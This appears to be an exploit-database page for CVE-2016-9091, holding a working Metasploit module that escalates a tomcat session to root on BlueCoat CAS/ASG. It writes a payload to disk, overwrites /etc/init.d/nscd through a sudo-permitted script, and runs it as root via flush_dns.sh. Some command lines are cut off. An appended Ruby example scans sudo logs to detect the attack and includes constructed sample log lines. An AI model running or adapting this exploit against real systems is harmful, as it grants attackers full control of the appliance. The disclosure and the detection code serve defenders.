Bluecoat ASG 6.6/CAS 1.3 - Privilege Escalation (Metasploit)
Source: chrisdhebert[at]gmail.com  Author: Hebert  Published: 2017-04-05
# Exploit Title: OS Command Injection Vulnerability in BlueCoat ASG and CAS
# Date: April 3, 2017
# Exploit Authors:  Chris Hebert, Peter Paccione and Corey Boyd
# Contact: chrisdhebert[at]gmail.com
# Vendor Security Advisory: https://bto.bluecoat.com/security-advisory/sa138
# Version: CAS 1.3 prior to 1.3.7.4 & ASG 6.6 prior to 6.6.5.4 are vulnerable
# Tested on: BlueCoat CAS 1.3.7.1
# CVE : cve-2016-9091
 
Timeline:
--------
08/31/2016 (Vulnerabilities Discovered)
03/31/2017 (Final Vendor Patch Confirmed)
04/03/2017 (Public Release)
 
Description:
The BlueCoat ASG and CAS management consoles are susceptible to a privilege escalation vulnerability.
A malicious user with tomcat privileges can escalate to root via the vulnerable mvtroubleshooting.sh script.
 
Proof of Concept:
 
Metasploit Module - root priv escalation (via mvtroubleshooting.sh)
-----------------
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
 
require 'msf/core'
require 'rex'
require 'msf/core/exploit/local/linux'
require 'msf/core/exploit/exe'
 
 
class Metasploit4 < Msf::Exploit::Local
  Rank = AverageRanking
 
  include Msf::Exploit::EXE
  include Msf::Post::File
  include Msf::Exploit::Local::Linux
 
  def initialize(info={})
    super( update_info( info, {
        'Name'          => 'BlueCoat CAS 1.3.7.1 tomcat->root privilege escalation (via mvtroubleshooting.sh)',
        'Description'   => %q{
          This module abuses the sudo access granted to tomcat and the mvtroubleshooting.sh script to escalate
          privileges. In order to work, a tomcat session with access to sudo on the sudoers
          is needed. This module is useful for post exploitation of BlueCoat
          vulnerabilities, where typically web server privileges are acquired, and this
          user is allowed to execute sudo on the sudoers file.
        },
        'License'        => MSF_LICENSE,
        'Author'       => [
         'Chris Hebert <chrisdhebert[at]gmail.com>',
         'Pete Paccione <petepaccione[at]gmail.com>',
         'Corey Boyd <corey.k.boyd[at]gmail.com>'
        ],
        'DisclosureDate' => 'Vendor Contacted 8-31-2016',
        'References'     =>
        [
          ['EDB', '##TBD##'],
          ['CVE', '2016-9091' ],
          ['URL', 'https://bto.bluecoat.com/security-advisory/sa138']
        ],
        'Platform'       => %w{ linux unix },
        'Arch'           => [ ARCH_X86 ],
        'SessionTypes'   => [ 'shell', 'meterpreter' ],
        'Targets'        =>
          [
            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ]
          ],
        'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
        'DefaultTarget' => 0,
      }
      ))
    register_options([
        OptString.new("WritableDir", [ false, "A directory where we can write files", "/var/log" ]),
      ], self.class)
  end
 
  def check
    id=cmd_exec("id -un")
    if id!="tomcat"
      print_status("#{peer} - ERROR - Session running as id= #{id}, but must be tomcat")
      fail_with(Failure::NoAccess, "Session running as id= #{id}, but must be tomcat")
    end
 
    clprelease=cmd_exec("cat /etc/clp-release | cut -d \" \" -f 3")
    if clprelease!="1.3.7.1"
      print_status("#{peer} - ERROR - BlueCoat version #{clprelease}, but must be 1.3.7.1")
      fail_with(Failure::NotVulnerable, "BlueCoat version #{clprelease}, but must be 1.3.7.1")
    end
 
    return Exploit::CheckCode::Vulnerable
  end
  def exploit
    print_status("#{peer} - Checking for vulnerable BlueCoat session...")
    if check != CheckCode::Vulnerable
      fail_with(Failure::NotVulnerable, "FAILED Exploit - BlueCoat not running as tomcat or not version 1.3.7.1")
    end
 
    print_status("#{peer} - Running Exploit...")
    exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
    write_file(exe_file, generate_payload_exe)
    cmd_exec "chmod +x #{exe_file}"
 
    begin
      #Backup original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /etc/init.d/nscd /data/bluecoat/avenger/ui/logs/tro$
      #Replaces /etc/init.d/nscd script with meterpreter payload
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh #{exe_file} /data/bluecoat/avenger/ui/logs/troubles$
      #Executes meterpreter payload as root
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/flush_dns.sh"
      #note, flush_dns.sh waits for payload to exit. (killing it falls over to init pid=1)
    ensure
      #Restores original nscd init script
      cmd_exec "/usr/bin/sudo /opt/bluecoat/avenger/scripts/mv_troubleshooting.sh /var/log/nscd.backup /data/bluecoat/avenger/ui/logs$
      #Remove meterpreter payload (precautionary as most recent mv_troubleshooting.sh should also remove it)
      cmd_exec "/bin/rm -f #{exe_file}"
    end
    print_status("#{peer} - The exploit module has finished")
    #Maybe something here to deal with timeouts?? noticed inconsistent..  Exploit failed: Rex::TimeoutError Operation timed out.
 
  end
end
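As an added defender-side example (not part of the original module or of BlueCoat's own code), the following Ruby scans standard sudo syslog records for the tomcat-to-root pattern the module relies on: mv_troubleshooting.sh invoked as root with an argument outside the troubleshooting log tree, followed by flush_dns.sh. The sudo record format is the stock one; the hostname, timestamps, the DEST_PLACEHOLDER argument and the assumption that legitimate calls stay inside /data/bluecoat/avenger/ui/logs are all constructed or assumed here.

```ruby
# Added detection example (not from the original module or BlueCoat): scan sudo
# syslog records for the tomcat -> root pattern the module above relies on.
SUDO_RE = /sudo:\s+(?<user>\S+)\s+:\s+.*?USER=(?<runas>\S+)\s+;\s+COMMAND=(?<cmd>.*)$/

SCRIPTS_DIR  = "/opt/bluecoat/avenger/scripts"          # paths from the module
MV_SCRIPT    = "#{SCRIPTS_DIR}/mv_troubleshooting.sh"
FLUSH_SCRIPT = "#{SCRIPTS_DIR}/flush_dns.sh"
# Assumption: legitimate mv_troubleshooting.sh calls only name files in this tree.
TROUBLESHOOT_DIR = "/data/bluecoat/avenger/ui/logs"

# Parse one syslog line into {user:, runas:, cmd:}, or nil for non-sudo records.
def parse_sudo(line)
  m = SUDO_RE.match(line)
  m ? { user: m[:user], runas: m[:runas], cmd: m[:cmd].strip } : nil
end

# Return findings (strings) for a batch of log lines, in order of appearance.
def suspicious_sudo(lines)
  findings = []
  tampered = false
  lines.each do |line|
    rec = parse_sudo(line)
    next unless rec && rec[:user] == "tomcat" && rec[:runas] == "root"
    argv = rec[:cmd].split
    case argv.first
    when MV_SCRIPT
      # Any argument outside the troubleshooting tree means the root-level move
      # reaches into the system (the module overwrites /etc/init.d/nscd this way).
      outside = argv.drop(1).reject { |a| a.start_with?(TROUBLESHOOT_DIR + "/") }
      unless outside.empty?
        tampered = true
        findings << "mv_troubleshooting.sh touched #{outside.join(' ')}"
      end
    when FLUSH_SCRIPT
      # Per the module's comments, flush_dns.sh runs the replaced nscd init
      # script as root, so after a tampering move it is the trigger.
      findings << "flush_dns.sh after tampering move" if tampered
    end
  end
  findings
end

# Constructed sample: host, timestamps and DEST_PLACEHOLDER are placeholders
# (the real destination argument is truncated in the module listing above).
PREFIX = "Apr  3 10:15:0%d cas sudo:   tomcat : TTY=unknown ; PWD=/var/log ; USER=root ; COMMAND="
SAMPLE_LOG = [
  (PREFIX % 1) + FLUSH_SCRIPT,                                    # routine, benign
  (PREFIX % 2) + "#{MV_SCRIPT} #{TROUBLESHOOT_DIR}/a.log #{TROUBLESHOOT_DIR}/b.log",
  "Apr  3 10:15:03 cas CRON[412]: (root) CMD (run-parts /etc/cron.hourly)",
  (PREFIX % 4) + "#{MV_SCRIPT} /etc/init.d/nscd #{TROUBLESHOOT_DIR}/DEST_PLACEHOLDER",
  (PREFIX % 5) + "#{MV_SCRIPT} /var/log/kqzd.elf #{TROUBLESHOOT_DIR}/DEST_PLACEHOLDER",
  (PREFIX % 6) + FLUSH_SCRIPT,                                    # triggers the payload
]
```

Running `suspicious_sudo(SAMPLE_LOG)` yields three findings: the two out-of-tree moves and the flush_dns.sh call that follows them; the benign move and the flush_dns.sh call before any tampering produce none.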
 
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved